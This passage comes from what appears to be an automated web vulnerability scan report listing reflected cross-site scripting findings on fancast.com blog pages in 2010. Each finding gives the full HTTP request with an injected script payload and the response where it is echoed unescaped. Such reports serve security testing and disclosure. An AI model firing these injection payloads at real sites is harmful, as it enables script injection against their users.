Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:12:26 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:17:25 GMT
Content-Length: 41792

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>Neil Patrick Harris Slams Eric B
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.fancast.com/blogs/2010/tv-newsb1b1c</script><script>alert(1)</script>e02b396ef72/neil-patrick-harris-slams-eric-braeden-for-bailing/&layout=button_count&show_faces=false&width=120&height=20&action=like&colorscheme=light" scrolling="no" frameborder="0" allowTransparency="true" styl
...[SNIP]...

2.479. http://www.fancast.com/blogs/2010/tv-news/neil-patrick-harris-slams-eric-braeden-for-bailing/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/neil-patrick-harris-slams-eric-braeden-for-bailing/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbc24"><script>alert(1)</script>235e6ac552d was submitted in the REST URL parameter 3. This input was echoed as dbc24\"><script>alert(1)</script>235e6ac552d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/2010/tv-newsdbc24"><script>alert(1)</script>235e6ac552d/neil-patrick-harris-slams-eric-braeden-for-bailing/ HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:12:20 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:17:20 GMT
Content-Length: 41762

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>Neil Patrick Harris Slams Eric B
...[SNIP]...
<meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-newsdbc24\"><script>alert(1)</script>235e6ac552d/neil-patrick-harris-slams-eric-braeden-for-bailing/"/>
...[SNIP]...

2.480. http://www.fancast.com/blogs/2010/tv-news/neil-patrick-harris-slams-eric-braeden-for-bailing/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/neil-patrick-harris-slams-eric-braeden-for-bailing/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eadf3</script><script>alert(1)</script>e2c125fe16a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/2010/tv-news/neil-patrick-harris-slams-eric-braeden-for-bailing/?eadf3</script><script>alert(1)</script>e2c125fe16a=1 HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:12:18 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:17:18 GMT
Content-Length: 41807

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>Neil Patrick Harris Slams Eric B
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.fancast.com/blogs/2010/tv-news/neil-patrick-harris-slams-eric-braeden-for-bailing/?eadf3</script><script>alert(1)</script>e2c125fe16a=1&layout=button_count&show_faces=false&width=120&height=20&action=like&colorscheme=light" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:120px; heig
...[SNIP]...

2.481. http://www.fancast.com/blogs/2010/tv-news/neil-patrick-harris-slams-eric-braeden-for-bailing/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/neil-patrick-harris-slams-eric-braeden-for-bailing/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22fc4"><script>alert(1)</script>9417ce6fc04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 22fc4\"><script>alert(1)</script>9417ce6fc04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/2010/tv-news/neil-patrick-harris-slams-eric-braeden-for-bailing/?22fc4"><script>alert(1)</script>9417ce6fc04=1 HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:12:11 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:17:11 GMT
Content-Length: 41777

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>Neil Patrick Harris Slams Eric B
...[SNIP]...
<meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-news/neil-patrick-harris-slams-eric-braeden-for-bailing/?22fc4\"><script>alert(1)</script>9417ce6fc04=1"/>
...[SNIP]...

2.482. http://www.fancast.com/blogs/2010/tv-news/olbermann-attacked-on-twitter-calls-oreilly-the-worst/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/olbermann-attacked-on-twitter-calls-oreilly-the-worst/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71465"><script>alert(1)</script>ef9d0053dc2 was submitted in the REST URL parameter 3. This input was echoed as 71465\"><script>alert(1)</script>ef9d0053dc2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/2010/tv-news71465"><script>alert(1)</script>ef9d0053dc2/olbermann-attacked-on-twitter-calls-oreilly-the-worst/ HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:12:19 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:17:19 GMT
Content-Length: 35668

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>Olbermann Attacked on Twitter, C
...[SNIP]...
<meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-news71465\"><script>alert(1)</script>ef9d0053dc2/olbermann-attacked-on-twitter-calls-oreilly-the-worst/"/>
...[SNIP]...

2.483. http://www.fancast.com/blogs/2010/tv-news/olbermann-attacked-on-twitter-calls-oreilly-the-worst/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/olbermann-attacked-on-twitter-calls-oreilly-the-worst/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41287</script><script>alert(1)</script>a27fdf1cd23 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/2010/tv-news41287</script><script>alert(1)</script>a27fdf1cd23/olbermann-attacked-on-twitter-calls-oreilly-the-worst/ HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:12:24 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:17:24 GMT
Content-Length: 35698

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>Olbermann Attacked on Twitter, C
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.fancast.com/blogs/2010/tv-news41287</script><script>alert(1)</script>a27fdf1cd23/olbermann-attacked-on-twitter-calls-oreilly-the-worst/&layout=button_count&show_faces=false&width=120&height=20&action=like&colorscheme=light" scrolling="no" frameborder="0" allowTransparency="true" s
...[SNIP]...

2.484. http://www.fancast.com/blogs/2010/tv-news/olbermann-attacked-on-twitter-calls-oreilly-the-worst/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/olbermann-attacked-on-twitter-calls-oreilly-the-worst/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5670</script><script>alert(1)</script>d05cc34a44a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/2010/tv-news/olbermann-attacked-on-twitter-calls-oreilly-the-worst/?a5670</script><script>alert(1)</script>d05cc34a44a=1 HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:12:18 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:17:17 GMT
Content-Length: 35713

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>Olbermann Attacked on Twitter, C
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.fancast.com/blogs/2010/tv-news/olbermann-attacked-on-twitter-calls-oreilly-the-worst/?a5670</script><script>alert(1)</script>d05cc34a44a=1&layout=button_count&show_faces=false&width=120&height=20&action=like&colorscheme=light" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:120px; heig
...[SNIP]...

2.485. http://www.fancast.com/blogs/2010/tv-news/olbermann-attacked-on-twitter-calls-oreilly-the-worst/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/olbermann-attacked-on-twitter-calls-oreilly-the-worst/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60714"><script>alert(1)</script>09bbc717872 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 60714\"><script>alert(1)</script>09bbc717872 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/2010/tv-news/olbermann-attacked-on-twitter-calls-oreilly-the-worst/?60714"><script>alert(1)</script>09bbc717872=1 HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:12:11 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:17:11 GMT
Content-Length: 35683

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>Olbermann Attacked on Twitter, C
...[SNIP]...
<meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-news/olbermann-attacked-on-twitter-calls-oreilly-the-worst/?60714\"><script>alert(1)</script>09bbc717872=1"/>
...[SNIP]...

2.486. http://www.fancast.com/blogs/2010/tv-news/sarah-palin-fires-back-calls-sorkins-criticism-appalling/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/sarah-palin-fires-back-calls-sorkins-criticism-appalling/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1276"><script>alert(1)</script>51691943018 was submitted in the REST URL parameter 3. This input was echoed as c1276\"><script>alert(1)</script>51691943018 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/2010/tv-newsc1276"><script>alert(1)</script>51691943018/sarah-palin-fires-back-calls-sorkins-criticism-appalling/ HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:12:25 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:17:24 GMT
Content-Length: 37716

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>Palin Fires Back, Calls Sorkin's
...[SNIP]...
<meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-newsc1276\"><script>alert(1)</script>51691943018/sarah-palin-fires-back-calls-sorkins-criticism-appalling/"/>
...[SNIP]...

2.487. http://www.fancast.com/blogs/2010/tv-news/sarah-palin-fires-back-calls-sorkins-criticism-appalling/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/sarah-palin-fires-back-calls-sorkins-criticism-appalling/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4706c</script><script>alert(1)</script>3b5c0ada87 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/2010/tv-news4706c</script><script>alert(1)</script>3b5c0ada87/sarah-palin-fires-back-calls-sorkins-criticism-appalling/ HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:12:32 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:17:31 GMT
Content-Length: 37741

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>Palin Fires Back, Calls Sorkin's
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.fancast.com/blogs/2010/tv-news4706c</script><script>alert(1)</script>3b5c0ada87/sarah-palin-fires-back-calls-sorkins-criticism-appalling/&layout=button_count&show_faces=false&width=120&height=20&action=like&colorscheme=light" scrolling="no" frameborder="0" allowTransparency="true
...[SNIP]...

2.488. http://www.fancast.com/blogs/2010/tv-news/sarah-palin-fires-back-calls-sorkins-criticism-appalling/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/sarah-palin-fires-back-calls-sorkins-criticism-appalling/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 551ef</script><script>alert(1)</script>15d6e4aece9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/2010/tv-news/sarah-palin-fires-back-calls-sorkins-criticism-appalling/?551ef</script><script>alert(1)</script>15d6e4aece9=1 HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:12:23 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:17:22 GMT
Content-Length: 37761

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>Palin Fires Back, Calls Sorkin's
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.fancast.com/blogs/2010/tv-news/sarah-palin-fires-back-calls-sorkins-criticism-appalling/?551ef</script><script>alert(1)</script>15d6e4aece9=1&layout=button_count&show_faces=false&width=120&height=20&action=like&colorscheme=light" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:120px; heig
...[SNIP]...

2.489. http://www.fancast.com/blogs/2010/tv-news/sarah-palin-fires-back-calls-sorkins-criticism-appalling/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/sarah-palin-fires-back-calls-sorkins-criticism-appalling/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d1b6"><script>alert(1)</script>1c40cfdcbef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6d1b6\"><script>alert(1)</script>1c40cfdcbef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/2010/tv-news/sarah-palin-fires-back-calls-sorkins-criticism-appalling/?6d1b6"><script>alert(1)</script>1c40cfdcbef=1 HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:12:13 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:17:12 GMT
Content-Length: 37731

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>Palin Fires Back, Calls Sorkin's
...[SNIP]...
<meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-news/sarah-palin-fires-back-calls-sorkins-criticism-appalling/?6d1b6\"><script>alert(1)</script>1c40cfdcbef=1"/>
...[SNIP]...

2.490. http://www.fancast.com/blogs/2010/tv-news/survivor-hall-of-fame-inductee-sandra-diaz-twine/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/survivor-hall-of-fame-inductee-sandra-diaz-twine/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fe7a"><script>alert(1)</script>34a967e9376 was submitted in the REST URL parameter 3. This input was echoed as 2fe7a\"><script>alert(1)</script>34a967e9376 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/2010/tv-news2fe7a"><script>alert(1)</script>34a967e9376/survivor-hall-of-fame-inductee-sandra-diaz-twine/ HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:20:07 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:25:07 GMT
Content-Length: 39713

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>'Survivor' Hall of Fame Inductee
...[SNIP]...
<meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-news2fe7a\"><script>alert(1)</script>34a967e9376/survivor-hall-of-fame-inductee-sandra-diaz-twine/"/>
...[SNIP]...

2.491. http://www.fancast.com/blogs/2010/tv-news/survivor-hall-of-fame-inductee-sandra-diaz-twine/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/survivor-hall-of-fame-inductee-sandra-diaz-twine/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47f95</script><script>alert(1)</script>4bbacd01e03 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/2010/tv-news47f95</script><script>alert(1)</script>4bbacd01e03/survivor-hall-of-fame-inductee-sandra-diaz-twine/ HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:20:13 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:25:12 GMT
Content-Length: 39743

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>'Survivor' Hall of Fame Inductee
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.fancast.com/blogs/2010/tv-news47f95</script><script>alert(1)</script>4bbacd01e03/survivor-hall-of-fame-inductee-sandra-diaz-twine/&layout=button_count&show_faces=false&width=120&height=20&action=like&colorscheme=light" scrolling="no" frameborder="0" allowTransparency="true" style=
...[SNIP]...

2.492. http://www.fancast.com/blogs/2010/tv-news/survivor-hall-of-fame-inductee-sandra-diaz-twine/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/survivor-hall-of-fame-inductee-sandra-diaz-twine/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae508</script><script>alert(1)</script>f5d2040ce27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/2010/tv-news/survivor-hall-of-fame-inductee-sandra-diaz-twine/?ae508</script><script>alert(1)</script>f5d2040ce27=1 HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:20:06 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:25:06 GMT
Content-Length: 39758

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>'Survivor' Hall of Fame Inductee
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.fancast.com/blogs/2010/tv-news/survivor-hall-of-fame-inductee-sandra-diaz-twine/?ae508</script><script>alert(1)</script>f5d2040ce27=1&layout=button_count&show_faces=false&width=120&height=20&action=like&colorscheme=light" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:120px; heig
...[SNIP]...

2.493. http://www.fancast.com/blogs/2010/tv-news/survivor-hall-of-fame-inductee-sandra-diaz-twine/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
